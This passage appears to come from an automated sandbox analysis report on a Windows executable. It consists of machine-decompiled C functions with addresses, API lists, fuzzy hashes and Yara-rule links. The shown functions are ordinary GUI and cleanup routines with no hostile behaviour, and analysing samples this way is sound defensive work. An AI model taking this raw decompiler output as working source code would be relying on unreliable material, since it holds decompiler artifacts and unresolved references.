                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: P
                                                                                • API String ID: 3227129158-3110715001
                                                                                • Opcode ID: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction ID: 8907f95ecabcbea213e89b25aadd05f800e1c1858eab99648a633ad0099d5281
                                                                                • Opcode Fuzzy Hash: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction Fuzzy Hash: EA118FB0605210AFE3109B29CC81B5E76D5EB84358F148A2EF0A4DB3D5DBB9D885C78A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00425BB8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E00425BB8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x425c81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x487a2c =  *0x487a2c + 1;
				if( *0x487a2c == 0) {
					_t3 =  *0x487a84; // 0x2290b50
					E004035B4(_t3);
					_t5 =  *0x46b784; // 0x0
					E004035B4(_t5);
					_t7 =  *0x46b780; // 0x0
					E004035B4(_t7);
					E00422B9C(__ebx, _t27);
					_t10 =  *0x46b788; // 0x2290b74
					E004035B4(_t10);
					_t12 =  *0x487a80; // 0x2290bb0
					E004035B4(_t12);
					_t14 =  *0x487a74; // 0x2290ad8
					E004035B4(_t14);
					_t16 =  *0x487a78; // 0x2290b00
					E004035B4(_t16);
					_t18 =  *0x487a7c; // 0x2290b28
					E004035B4(_t18);
					_t20 =  *0x487a28; // 0x510805d2
					DeleteObject(_t20);
					_push(0x487a44);
					L00406838();
					_push(0x487a5c);
					L00406838();
					_t34 =  *0x412938; // 0x41293c
					E00404E00(0x46b6a0, 0x12, _t34);
					_t35 =  *0x412938; // 0x41293c
					E00404E00(0x46b518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x425c88);
				return 0;
			}

















                                                                                0x00425bb8
                                                                                0x00425bbd
                                                                                0x00425bbe
                                                                                0x00425bc3
                                                                                0x00425bc6
                                                                                0x00425bc9
                                                                                0x00425bcf
                                                                                0x00425bd5
                                                                                0x00425bda
                                                                                0x00425bdf
                                                                                0x00425be4
                                                                                0x00425be9
                                                                                0x00425bee
                                                                                0x00425bf3
                                                                                0x00425bf8
                                                                                0x00425bfd
                                                                                0x00425c02
                                                                                0x00425c07
                                                                                0x00425c0c
                                                                                0x00425c11
                                                                                0x00425c16
                                                                                0x00425c1b
                                                                                0x00425c20
                                                                                0x00425c25
                                                                                0x00425c2a
                                                                                0x00425c30
                                                                                0x00425c35
                                                                                0x00425c3a
                                                                                0x00425c3f
                                                                                0x00425c44
                                                                                0x00425c53
                                                                                0x00425c59
                                                                                0x00425c68
                                                                                0x00425c6e
                                                                                0x00425c6e
                                                                                0x00425c75
                                                                                0x00425c78
                                                                                0x00425c7b
                                                                                0x00425c80

                                                                                APIs
                                                                                • DeleteObject.GDI32(510805D2), ref: 00425C30
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A44,510805D2,00000000,00425C81), ref: 00425C3A
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A5C,00487A44,510805D2,00000000,00425C81), ref: 00425C44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Delete$CriticalSection$Object
                                                                                • String ID: <)A
                                                                                • API String ID: 378701848-2544708363
                                                                                • Opcode ID: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction ID: 22795a93df35987cad2729373931b2b91126da6fc89bb47129e9437559cd03b6
                                                                                • Opcode Fuzzy Hash: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction Fuzzy Hash: 08013CB03141009BC715FF26ED5290D7768E744705360487BF000A7BB2DA7CDE518B8D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B34C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040B34C() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x46b0e4 = _t1;
				}
				if( *0x46b0e4 == 0) {
					 *0x46b0e4 = E00408ACC;
					return E00408ACC;
				}
				return _t1;
			}





                                                                                0x0040b352
                                                                                0x0040b357
                                                                                0x0040b35b
                                                                                0x0040b363
                                                                                0x0040b368
                                                                                0x0040b368
                                                                                0x0040b374
                                                                                0x0040b37b
                                                                                0x00000000
                                                                                0x0040b37b
                                                                                0x0040b381

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C025,00000000,0040C038), ref: 0040B352
                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction ID: a513fbbfe291899ee6294738837c62684835be1d612828af4dfd11c86fef4dc6
                                                                                • Opcode Fuzzy Hash: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction Fuzzy Hash: 6BD05EA17023026ED300ABA05D8160F2544D300304B21803BE902B52D2E7BC885146CE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00463678, Relevance: 6.2, APIs: 4, Instructions: 225windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E00463678(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00460E0C( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E004631E0( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E0041FCC0( *((intOrPtr*)( *_t212 + 0x208)));
					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E0041FC00(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041F338( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041EB4C( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E004617E4(_v36);
					_v38 = E00460EF8(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043BD14( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00463858))) {
							case 0:
								E00463250(_t213);
								goto L22;
							case 1:
								__eax = E0046345C(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E004633AC(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E004632A0(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E0046350C(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E00463594(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x463968; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043BD14( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x463964; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x463960; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}



































                                                                                0x00463678
                                                                                0x00463687
                                                                                0x00463688
                                                                                0x00463689
                                                                                0x0046368a
                                                                                0x0046368b
                                                                                0x0046368e
                                                                                0x00463691
                                                                                0x0046369c
                                                                                0x004636a1
                                                                                0x004636a5
                                                                                0x004636b7
                                                                                0x00000000
                                                                                0x004636c1
                                                                                0x004636cb
                                                                                0x004636cd
                                                                                0x004636d4
                                                                                0x00463798
                                                                                0x00463798
                                                                                0x004637a5
                                                                                0x004637b0
                                                                                0x004637b0
                                                                                0x004637b6
                                                                                0x004637b8
                                                                                0x004637ba
                                                                                0x004637ba
                                                                                0x004637bd
                                                                                0x004637c2
                                                                                0x004637cf
                                                                                0x004637dc
                                                                                0x004637e6
                                                                                0x004637f9
                                                                                0x00463804
                                                                                0x00463807
                                                                                0x00463811
                                                                                0x0046381e
                                                                                0x0046381e
                                                                                0x00463829
                                                                                0x00463834
                                                                                0x0046383f
                                                                                0x00463845
                                                                                0x0046384c
                                                                                0x0046384f
                                                                                0x004638a4
                                                                                0x004638a6
                                                                                0x004638ac
                                                                                0x004638af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004638b5
                                                                                0x004638b8
                                                                                0x004638bc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004638c4
                                                                                0x004638d6
                                                                                0x004638d9
                                                                                0x004638db
                                                                                0x004638e2
                                                                                0x004638e7
                                                                                0x004638ea
                                                                                0x004638ec
                                                                                0x004638f3
                                                                                0x004638f5
                                                                                0x004638f5
                                                                                0x004638f5
                                                                                0x004638f5
                                                                                0x004638f3
                                                                                0x004638fa
                                                                                0x00463900
                                                                                0x00463902
                                                                                0x00463904
                                                                                0x00463906
                                                                                0x00463910
                                                                                0x00463910
                                                                                0x00463910
                                                                                0x00463910
                                                                                0x00463906
                                                                                0x00463913
                                                                                0x00463915
                                                                                0x0046391f
                                                                                0x0046391f
                                                                                0x0046391f
                                                                                0x0046391f
                                                                                0x00463924
                                                                                0x0046392b
                                                                                0x00463930
                                                                                0x00463932
                                                                                0x00000000
                                                                                0x00463934
                                                                                0x00463934
                                                                                0x00463936
                                                                                0x0046393d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463951
                                                                                0x00463851
                                                                                0x00463851
                                                                                0x00000000
                                                                                0x00463871
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046387a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046388c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463883
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463895
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046389e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463851
                                                                                0x004636da
                                                                                0x004636da
                                                                                0x004636dc
                                                                                0x004636e4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004636ea
                                                                                0x004636f2
                                                                                0x004636f5
                                                                                0x00463779
                                                                                0x00000000
                                                                                0x0046378d
                                                                                0x004636f9
                                                                                0x00463700
                                                                                0x00463705
                                                                                0x00463707
                                                                                0x00463756
                                                                                0x00000000
                                                                                0x0046376a
                                                                                0x0046370d
                                                                                0x00463721
                                                                                0x00463727
                                                                                0x00463729
                                                                                0x00463730
                                                                                0x0046395c
                                                                                0x0046395c
                                                                                0x0046395c
                                                                                0x00000000
                                                                                0x00463748

                                                                                APIs
                                                                                • GetFocus.USER32 ref: 00463700
                                                                                • DrawFocusRect.USER32 ref: 00463748
                                                                                  • Part of subcall function 0041F9D0: FillRect.USER32 ref: 0041F9F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FocusRect$DrawFill
                                                                                • String ID:
                                                                                • API String ID: 3476037706-0
                                                                                • Opcode ID: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction ID: 8f207b3e41a278f91515001cd5490541224029e2ee33265223180d2149407fd5
                                                                                • Opcode Fuzzy Hash: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction Fuzzy Hash: 79917E74A001458FCB10EF58C4C5AAEB7F5BF08315F2444BAE9849B316E778AD86CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004335B0, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E004335B0(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x487ba0 != 0) {
					L3:
					_t49 =  *0x487b80; // 0x0
					_t50 =  *0x487b80; // 0x0
					_t117 = E00433490(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x487ba0 == 0) {
						_t168 =  *0x487ba4;
						if( *0x487ba4 != 0) {
							_t106 =  *0x487b94; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x487ba4; // 0x0
							E0043D6C4(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x487b80; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x487ba0;
						_t6 =  &_v24;
						 *_t6 =  *0x487ba0 != 0;
						__eflags =  *_t6;
						 *0x487ba0 = 2;
					} else {
						 *0x487ba0 = 1;
						_v24 = 0;
					}
					_t54 =  *0x487b84; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x487b84; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x487b84; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x487b84; // 0x0
							E004351E4( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x487b84; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E004334E0(2);
						_t121 =  *_t155;
						_t60 =  *0x487b84; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x487ba4 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x487ba4; // 0x0
								E0043D680(_t82, _t158);
								_t84 =  *0x487ba4; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x487ba4; // 0x0
									E0043D7AC(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x487ba4; // 0x0
									E0043D6C4(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x487ba4; // 0x0
								E0043D820(_t91, _t131, __eflags);
								_t93 =  *0x486dac; // 0x487c00
								SetCursor(E004536BC( *_t93, _t158));
							}
						}
						_t62 =  *0x486dac; // 0x487c00
						_t65 = SetCursor(E004536BC( *_t62, _t158));
						if( *0x487ba0 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E0043351C(_t121);
								_t67 =  *0x487b84; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E004351E4(_t118,  &_v24, _t155);
									_t65 = E004037B0(_t118, __eflags);
									_t135 =  *0x487b84; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x487b84; // 0x0
									_t65 = E004037B0( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x487b84; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x487b84; // 0x0
								_t65 = E004037B0( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x487b84 == 0) {
								goto L32;
							} else {
								_t119 =  *0x487b84; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E0040845C(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x487b84; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x487b84; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x487b84; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E004334E0(1);
					if( *0x487b84 == 0) {
						goto L32;
					}
					_t102 =  *0x487b84; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x487b84; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x487b84; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E004334E0(0);
					if( *0x487b84 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x487b90; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x487b9c; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x487b94; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x487b9c; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                                0x004335b6
                                                                                0x004335bf
                                                                                0x004335ee
                                                                                0x004335ee
                                                                                0x004335f4
                                                                                0x0043360a
                                                                                0x00433613
                                                                                0x00433615
                                                                                0x0043361c
                                                                                0x0043361e
                                                                                0x00433624
                                                                                0x00433631
                                                                                0x00433636
                                                                                0x00433636
                                                                                0x0043361c
                                                                                0x0043363b
                                                                                0x00433647
                                                                                0x00433657
                                                                                0x0043365e
                                                                                0x0043365e
                                                                                0x0043365e
                                                                                0x00433663
                                                                                0x00433649
                                                                                0x00433649
                                                                                0x00433650
                                                                                0x00433650
                                                                                0x0043366a
                                                                                0x00433672
                                                                                0x004336bf
                                                                                0x004336bf
                                                                                0x004336c6
                                                                                0x004336cc
                                                                                0x004336cf
                                                                                0x004336d8
                                                                                0x004336e0
                                                                                0x004336e8
                                                                                0x004336ed
                                                                                0x004336f6
                                                                                0x004336fd
                                                                                0x004336fd
                                                                                0x0043370b
                                                                                0x0043370d
                                                                                0x0043370f
                                                                                0x00433719
                                                                                0x00433722
                                                                                0x00433726
                                                                                0x00433730
                                                                                0x00433735
                                                                                0x0043373a
                                                                                0x0043373f
                                                                                0x00433743
                                                                                0x0043375e
                                                                                0x00433763
                                                                                0x00433768
                                                                                0x00433745
                                                                                0x00433749
                                                                                0x00433750
                                                                                0x00433752
                                                                                0x00433757
                                                                                0x00433757
                                                                                0x0043376f
                                                                                0x0043376f
                                                                                0x00433774
                                                                                0x0043377c
                                                                                0x00433789
                                                                                0x00433789
                                                                                0x00433726
                                                                                0x00433791
                                                                                0x0043379e
                                                                                0x004337aa
                                                                                0x0043387d
                                                                                0x0043387d
                                                                                0x004337b0
                                                                                0x004337b0
                                                                                0x004337b2
                                                                                0x004337d3
                                                                                0x004337d5
                                                                                0x004337da
                                                                                0x004337dd
                                                                                0x004337df
                                                                                0x0043380d
                                                                                0x0043381c
                                                                                0x00433821
                                                                                0x00433827
                                                                                0x004337e1
                                                                                0x004337e9
                                                                                0x004337f5
                                                                                0x004337fa
                                                                                0x00433800
                                                                                0x00433800
                                                                                0x004337b4
                                                                                0x004337b7
                                                                                0x004337ba
                                                                                0x004337c7
                                                                                0x004337c7
                                                                                0x00433831
                                                                                0x00000000
                                                                                0x00433833
                                                                                0x00433833
                                                                                0x00433839
                                                                                0x0043383c
                                                                                0x00433844
                                                                                0x0043384b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433852
                                                                                0x00433854
                                                                                0x0043385b
                                                                                0x0043385b
                                                                                0x0043385e
                                                                                0x00433865
                                                                                0x00433868
                                                                                0x00433873
                                                                                0x00433874
                                                                                0x00433875
                                                                                0x00433876
                                                                                0x00000000
                                                                                0x00433876
                                                                                0x00433831
                                                                                0x004337aa
                                                                                0x00433676
                                                                                0x00433682
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433688
                                                                                0x0043368d
                                                                                0x00433690
                                                                                0x00433698
                                                                                0x0043369b
                                                                                0x004336a2
                                                                                0x004336a8
                                                                                0x004336ad
                                                                                0x004336b9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004336b9
                                                                                0x004335c1
                                                                                0x004335c8
                                                                                0x004335cd
                                                                                0x004335d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004335d5
                                                                                0x004335dd
                                                                                0x004335e0
                                                                                0x004335e2
                                                                                0x004335e8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00433624
                                                                                • GetDesktopWindow.USER32 ref: 00433749
